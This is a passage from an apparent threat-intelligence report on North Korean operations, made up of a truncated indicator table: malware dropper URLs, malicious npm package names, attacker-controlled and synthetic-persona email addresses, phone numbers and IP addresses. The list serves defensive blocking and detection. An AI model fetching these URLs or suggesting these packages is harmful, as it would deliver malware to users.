m\r\ndropper UR\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 26 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nhttps://vscode-load.vercel.app/settings/mac?flag=9 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load.vercel.app/settings/windows?flag=2 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load.vercel.app/settings/windows?flag=4 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://vscode-load.vercel.app/settings/windows?flag=9 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://web3-metric-analytics.vercel.app/api/getMoralisData url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\nhttps://zone-api-navy.vercel.app/api/ip-check/99 url malware N/A N/A\r\nJavaScript m\r\ndropper UR\r\npassport-google-auth-token\r\nnpm\r\npackage\r\nmalware N/A N/A\r\nMalicious N\r\ndependency\r\ndeliver malw\r\ndotenv-extend\r\nnpm\r\npackage\r\nmalware N/A N/A\r\nMalicious N\r\ndependency\r\ndeliver malw\r\ntailwindcss-animation-advanced\r\nnpm\r\npackage\r\nmalware N/A N/A\r\nMalicious N\r\ndependency\r\ndeliver malw\r\nseeds-random\r\nnpm\r\npackage\r\nmalware N/A N/A\r\nMalicious N\r\ndependency\r\ndeliver malw\r\nchai-jsons\r\nnpm\r\npackage\r\nmalware N/A N/A\r\nMalicious N\r\ndependency\r\ndeliver malw\r\ndotenv-intend\r\nnpm\r\npackage\r\nmalware N/A N/A\r\nMalicious N\r\ndependency\r\ndeliver malw\r\npreset-log\r\nnpm\r\npackage\r\nmalware N/A N/A\r\nMalicious N\r\ndependency\r\ndeliver malw\r\n111.197.183.74 ipv4 insider\r\nOctober\r\n2025\r\nOctober\r\n2025\r\nOriginating\r\naddress of K\r\nKang\r\nalancdouglas@googlemail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nalphatech1010@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\namitnyc007@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nanniegirl2023@163.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nappyleonardo77@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nawmango123@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 27 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nbowavelink@163.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\ncpduran0622@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\ndocker1001@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nelvialc620@163.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nemilyvanessaaa@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nenrique122528@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nerasmusmadridtrops@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nericdoublin1111@yahoo.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\neruqulpuaro@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\neruqulpuaro@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\neruqulpuaro1@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\neruqulpuaro1@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nfangshan2019@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\ngoldstar0906@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\ngtracks.onelink@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhappycoder1111@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhappyleonardo77@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhittapa9@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhousinginmadrid@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nimadjeghalef@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nimranwork44@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nindulgenight@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njaneisman@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 28 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\njaneisman21@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njingya0131@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njinkonachi@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njoizelmorojo@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njorgencnc0608@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njorgencnc0608@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njorgencnc960608@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njose.bfran86@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\njose.bfran86@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nk_star_0131@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkbsy2019@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkhatijha555@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkk14s@ya.ru email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nknightrogue414@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkonachi0531@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkosong0926@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nkosong0926@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nlava_0208@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nleonardo_perez@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nli.guangri.2020@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nlovinmadrid@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nmarza0219@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nmazheng225@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 29 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nmichael-mardjuki@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nmichael.getz28@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nonepushsing@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nowaisugh75@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\npaku_2018@yahoo.co.jp email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\npohs0131@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nr_gi_19950603@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nr_gi19950603@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nraphael.privat@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nrhs0219@hotmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nrksonava1@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nrodev097@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nsilverbead0815@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nsilverbead0815@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nsu0220@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nsuperth55@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\ntruelife3188@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nvickydev1018@outlook.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nvictm1121@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\nwangsmithsilverstar@gmail.com email insider N/A N/A\r\nThreat actor\r\ncontrolled e\r\n8613341122552\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\n8618811177571\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 30 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\n8617701222967\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\n8618911321235\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\n8619910229812\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\n8613381035676\r\nphone\r\nnumber\r\ninsider N/A N/A\r\nMobile num\r\nChina-based\r\nmember\r\ntinsimonov@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbogomildaskalov001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nblazhejovanovska@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nsarloevtim39@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nantonisharalampopoulos@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\naleksandarradakovic122@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkrstoilovski@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nfilipbackus@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbelarosviska@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nladislav.kvarda525@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnovskapetar@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\npeceyurukov@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnikolamilev166@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nemil.rysinov@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvinkolukac.dev@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvalentincinika@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbosevskibale6@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 31 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nvlanosdimitri001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nPeterVargova@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvlastimirdeskov001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\naidaszvikas@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntrendafilmakedonija001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndmitrycebotari@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nchrisgergo00@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbriangaida12@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nwiktor.rogal@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmichalcopik1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nalbertdymek@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndobromirkovachev@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntoma.andric@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndanielmonilis@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvladimirvoski001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkolyotroske001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nborissudar.cro@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbodorbenci@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nivoloucky@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nyorgosdulev@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbalazspapp@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njuliankopala.pol@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnanusevskitodor@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 32 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nediurmankovic.cc@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvuksanbojanic@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbarry__johnson@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ngary__leduc@hotmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nadamikjelen@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nionguzlok@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nantonijakub11@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nleonidasnefeli@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nalexandrurusu2@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nadrianceban1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nflorinbarbu1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndanielsala2@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nivanhorvat2@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnikolastojanovski2@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ngabrieltamas1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvictorajdini@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ngavrilvasilevski001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nstojannastevski001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nemirapolloni@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ngorantomik1@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njonasvarga1@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndzholedinkov001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nLaszloEniko@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 33 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nlazarbulatovic56@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nemilkokolnska@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\niacovlevguzun@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndovydasmatis@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntomaskovacova@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nantoninowak12@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nerikslamka1@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkostasmichalakakou@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njokubasbieliauskas1@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nstoilesideropoulos001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndamjandobrudzhanski@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkutayijaz@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nsimeondimitris001@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbobituntev001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvelyokazepov@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnestorovskiemilija100@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nankaankahristov@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nrandoviska@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nborislavbabic431@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbenicdominik81@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nteoantunovic6@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\npopovicjelena727@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvaskovdime@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 34 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\njozefmtech@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\narchelaosasani@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njanlindberg80@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnevenborisov@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntoni.komadina@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndamianwalczak.work@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndenis.dobrovodsky@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nfilip.lovren@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntomislavjurak@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nemilijan.hristov@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nzoran.parlov@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nivanmatic.fs@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmarcelpaw.lowski@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntomislavbozic.work@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndominik.wojk@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\npiotrglowacki.pol@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nleonzielinski.pol@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nstanislav.timko@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\noleg.kaplanski@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nrafael.ratkovic@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmateusz.moczar@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nnadoyankovic@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndionizy.kohutek@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 35 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nemilsvalina@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkostic.gordan@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njosipbraut@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmirantrkulja@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\npavlehristov.work@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvedranpodrug@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nzvonkobogdan.cr@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nfilipdamevski001@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nalbertoszlar52@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nbenjaminellertsson@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nfedorkadoic@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nizakholmberg12@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmarkusvillig20@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nreigojakobson45@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nmasudtarik69@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nvaikokangur45@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nosogovskiplanini001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\naleksonikov001@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nangelovaandreev@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nivanopavic13@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ndavorsabolic2@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\njuricleon407@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nkondradgodzki@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 36 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nvelizarborisov.fs@outlook.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\ntrivuniliikc519@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nalexandermori1218@gmail.com email insider N/A N/A\r\nSynthetic pe\r\nemail\r\nsmupyknight@outlook.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nbtrs.corp@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nbyolate@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nstarneit105@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nchrissamuel729@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nlozanvranic@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nqoneits@outlook.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nkitdb@outlook.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nd.musatovdv@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nnikola.radomic322@gmail.com email insider N/A N/A\r\nDPRK deve\r\nemail\r\nduykhanh.prodev@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nchebiinixon91@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\njeffukus@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nmohamed_dhifli@hotmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nsaputranady@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nryannguyen0303@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nfahrultect@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\npatrickjuniorukutegbe@rocketmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nfahrultech@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nmirzayevorzu127@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 37 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\ntsunaminori@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nyhwucss@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nbtrs.corp@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nledanglong@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\ncwertlinks@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nbukoyesamuel9@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\ngwanchi@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nefezinoukpowe@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nthnam0107@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nvijanakaush@gmail.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nluis.miguel208@outlook.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nsmupyknight@outlook.com email insider N/A N/A\r\nGit mirror d\r\nidentity\r\nbrankojovovic99@gmail.com email insider N/A N/A\r\nAdministrat\r\naccounts on\r\nservices\r\nmanuetuazon.work@gmail.com email insider N/A N/A\r\nAdministrat\r\naccounts on\r\nservices\r\nupwork.management.whm@outlook.com email insider N/A N/A\r\nAdministrat\r\naccounts on\r\nservices\r\n1.20.169.90 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.106.112.166 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.152.100.221 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.155.199.28 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.174.81.10 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 38 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\n103.190.171.37 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n103.39.70.248 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n107.178.11.226 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n107.189.8.240 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n113.160.133.32 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n115.72.1.61 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n117.1.101.198 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n121.132.60.117 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n125.26.238.166 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n139.178.67.134 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n14.225.215.117 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n143.110.226.180 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n144.217.207.22 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n146.190.114.113 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n147.28.155.20 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n148.72.168.81 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.34 ipv4 insider August\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nhttps://about.gitlab.com/blog/gitlab-threat-intelligence-reveals-north-korean-tradecraft/\r\nPage 39 of 48\n\nIndicator Type Risk\r\nFirst\r\nSeen\r\nLast Seen Comment\r\nshared origi\r\n152.26.229.42 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.46 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.47 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared origi\r\n152.26.229.83 ipv4 insider\r\nAugust\r\n2024\r\nNovember\r\n2024\r\nThreat actor\r\naddress (ma\r\nshared 